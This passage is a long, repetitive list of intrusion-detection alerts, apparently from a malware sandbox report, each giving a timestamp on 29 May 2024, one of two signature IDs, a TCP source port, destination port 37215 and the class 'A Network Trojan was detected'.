                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653495
                SID:2829579
                Source Port:60896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472062
                SID:2835222
                Source Port:36648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.568909
                SID:2835222
                Source Port:35036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714558
                SID:2835222
                Source Port:34730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.131595
                SID:2835222
                Source Port:39100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.869494
                SID:2829579
                Source Port:56524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717107
                SID:2829579
                Source Port:39904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562035
                SID:2835222
                Source Port:56164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653867
                SID:2835222
                Source Port:37150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941337
                SID:2829579
                Source Port:55712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984877
                SID:2835222
                Source Port:35098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.430900
                SID:2835222
                Source Port:35606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509836
                SID:2835222
                Source Port:34466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173118
                SID:2835222
                Source Port:44852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264354
                SID:2835222
                Source Port:35206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445447
                SID:2835222
                Source Port:57996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437555
                SID:2835222
                Source Port:55584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858671
                SID:2829579
                Source Port:48160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282188
                SID:2829579
                Source Port:41914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783362
                SID:2829579
                Source Port:49760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.241704
                SID:2829579
                Source Port:45892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688286
                SID:2835222
                Source Port:41884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220566
                SID:2835222
                Source Port:43862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364230
                SID:2829579
                Source Port:58292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896400
                SID:2835222
                Source Port:36672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559371
                SID:2835222
                Source Port:46278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669583
                SID:2835222
                Source Port:56524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628503
                SID:2829579
                Source Port:34888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397127
                SID:2829579
                Source Port:44624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764399
                SID:2835222
                Source Port:35788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524467
                SID:2829579
                Source Port:50392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292082
                SID:2829579
                Source Port:41796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786659
                SID:2829579
                Source Port:48112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689552
                SID:2835222
                Source Port:42820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.094033
                SID:2829579
                Source Port:59634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.161300
                SID:2835222
                Source Port:56880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908311
                SID:2835222
                Source Port:49076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447223
                SID:2835222
                Source Port:52432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663943
                SID:2829579
                Source Port:60986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618496
                SID:2829579
                Source Port:41020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685080
                SID:2829579
                Source Port:58586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073831
                SID:2829579
                Source Port:46342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.705043
                SID:2835222
                Source Port:36568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655022
                SID:2829579
                Source Port:54974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731596
                SID:2835222
                Source Port:49956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.435495
                SID:2835222
                Source Port:40730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465848
                SID:2829579
                Source Port:51424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655123
                SID:2835222
                Source Port:33176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336191
                SID:2829579
                Source Port:50870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228164
                SID:2835222
                Source Port:38588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931961
                SID:2829579
                Source Port:58656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290492
                SID:2829579
                Source Port:38122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169492
                SID:2835222
                Source Port:33354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512244
                SID:2829579
                Source Port:57174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519335
                SID:2829579
                Source Port:56286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862804
                SID:2835222
                Source Port:35178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335860
                SID:2829579
                Source Port:58046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854509
                SID:2835222
                Source Port:54136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337204
                SID:2829579
                Source Port:36022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.879310
                SID:2829579
                Source Port:50900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882794
                SID:2835222
                Source Port:38144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571480
                SID:2829579
                Source Port:58510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862991
                SID:2835222
                Source Port:52996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100655
                SID:2829579
                Source Port:35418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956146
                SID:2829579
                Source Port:39622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725402
                SID:2829579
                Source Port:48514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655675
                SID:2829579
                Source Port:57414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473562
                SID:2835222
                Source Port:55512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667959
                SID:2835222
                Source Port:47828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810448
                SID:2835222
                Source Port:34944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.229929
                SID:2829579
                Source Port:48286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920827
                SID:2829579
                Source Port:47938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926297
                SID:2835222
                Source Port:36436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845341
                SID:2835222
                Source Port:56964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848754
                SID:2829579
                Source Port:36012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655690
                SID:2835222
                Source Port:56300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958870
                SID:2835222
                Source Port:41316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654957
                SID:2835222
                Source Port:54584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711249
                SID:2835222
                Source Port:60746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738477
                SID:2829579
                Source Port:34048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177977
                SID:2835222
                Source Port:42640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.702451
                SID:2835222
                Source Port:39896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955291
                SID:2835222
                Source Port:56790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900386
                SID:2835222
                Source Port:36450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.921011
                SID:2835222
                Source Port:32972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764383
                SID:2829579
                Source Port:49932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.331037
                SID:2835222
                Source Port:47046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100804
                SID:2835222
                Source Port:55906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533832
                SID:2835222
                Source Port:43092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614360
                SID:2835222
                Source Port:42004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267719
                SID:2835222
                Source Port:58356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374401
                SID:2829579
                Source Port:33814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160950
                SID:2829579
                Source Port:59408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275429
                SID:2829579
                Source Port:37248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263791
                SID:2829579
                Source Port:43396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521084
                SID:2835222
                Source Port:44244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773694
                SID:2829579
                Source Port:56414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858607
                SID:2829579
                Source Port:44254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951094
                SID:2829579
                Source Port:51542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782506
                SID:2835222
                Source Port:43868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.034720
                SID:2829579
                Source Port:56496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980740
                SID:2829579
                Source Port:46646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612430
                SID:2829579
                Source Port:46692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025869
                SID:2835222
                Source Port:50618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665317
                SID:2829579
                Source Port:44360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466219
                SID:2835222
                Source Port:42708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655053
                SID:2829579
                Source Port:33930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290404
                SID:2829579
                Source Port:60290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331539
                SID:2835222
                Source Port:36812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338901
                SID:2835222
                Source Port:52680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.930508
                SID:2829579
                Source Port:60664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611536
                SID:2829579
                Source Port:49032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232102
                SID:2835222
                Source Port:52610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517776
                SID:2829579
                Source Port:46494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932019
                SID:2829579
                Source Port:40410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455123
                SID:2835222
                Source Port:60582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421856
                SID:2829579
                Source Port:57736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701569
                SID:2835222
                Source Port:58200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276219
                SID:2829579
                Source Port:42488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947292
                SID:2835222
                Source Port:34376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281724
                SID:2835222
                Source Port:44408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008777
                SID:2835222
                Source Port:60310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977267
                SID:2835222
                Source Port:57332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909744
                SID:2835222
                Source Port:52218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854501
                SID:2835222
                Source Port:47010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899008
                SID:2835222
                Source Port:55412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.024910
                SID:2835222
                Source Port:52320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571893
                SID:2835222
                Source Port:52316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267036
                SID:2835222
                Source Port:60868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617578
                SID:2835222
                Source Port:56194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184414
                SID:2835222
                Source Port:35212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170220
                SID:2835222
                Source Port:41340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220542
                SID:2829579
                Source Port:41816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511444
                SID:2835222
                Source Port:34374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740272
                SID:2835222
                Source Port:34032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212028
                SID:2835222
                Source Port:38888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394825
                SID:2829579
                Source Port:36732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843786
                SID:2835222
                Source Port:59832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740309
                SID:2829579
                Source Port:60978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764300
                SID:2835222
                Source Port:35010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858223
                SID:2835222
                Source Port:33544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664566
                SID:2835222
                Source Port:43412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824706
                SID:2829579
                Source Port:58980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860492
                SID:2829579
                Source Port:52646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166205
                SID:2829579
                Source Port:37556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364772
                SID:2835222
                Source Port:56696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575723
                SID:2829579
                Source Port:42570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420245
                SID:2835222
                Source Port:43204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326133
                SID:2829579
                Source Port:58258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979577
                SID:2829579
                Source Port:50104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319566
                SID:2829579
                Source Port:55346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983948
                SID:2829579
                Source Port:55026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043809
                SID:2829579
                Source Port:53830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653031
                SID:2829579
                Source Port:59494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069800
                SID:2829579
                Source Port:58128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511144
                SID:2835222
                Source Port:50856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427462
                SID:2835222
                Source Port:46890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787152
                SID:2829579
                Source Port:34628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.369088
                SID:2829579
                Source Port:48202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797904
                SID:2829579
                Source Port:56224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165795
                SID:2829579
                Source Port:45460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938874
                SID:2829579
                Source Port:48606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436305
                SID:2829579
                Source Port:41064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166988
                SID:2835222
                Source Port:37660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283208
                SID:2835222
                Source Port:33740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811090
                SID:2829579
                Source Port:41382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521280
                SID:2829579
                Source Port:50644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332787
                SID:2835222
                Source Port:59490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804037
                SID:2835222
                Source Port:43088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558642
                SID:2835222
                Source Port:48806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967642
                SID:2835222
                Source Port:43494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742752
                SID:2835222
                Source Port:39166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172840
                SID:2829579
                Source Port:48860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135523
                SID:2829579
                Source Port:59090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840358
                SID:2829579
                Source Port:50262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518887
                SID:2835222
                Source Port:51066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023395
                SID:2835222
                Source Port:56898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867935
                SID:2835222
                Source Port:57690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763106
                SID:2835222
                Source Port:37960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.094980
                SID:2829579
                Source Port:43476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415107
                SID:2829579
                Source Port:49320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842230
                SID:2829579
                Source Port:50384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441060
                SID:2829579
                Source Port:41190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465356
                SID:2835222
                Source Port:59266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462491
                SID:2829579
                Source Port:54282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850214
                SID:2829579
                Source Port:39916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.102381
                SID:2829579
                Source Port:42458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794312
                SID:2829579
                Source Port:57796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728349
                SID:2829579
                Source Port:50932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266527
                SID:2835222
                Source Port:47358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.231611
                SID:2829579
                Source Port:53530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.865969
                SID:2829579
                Source Port:53048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335922
                SID:2829579
                Source Port:35638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512111
                SID:2829579
                Source Port:56130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597009
                SID:2835222
                Source Port:50252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.914860
                SID:2829579
                Source Port:34590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983979
                SID:2829579
                Source Port:50156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
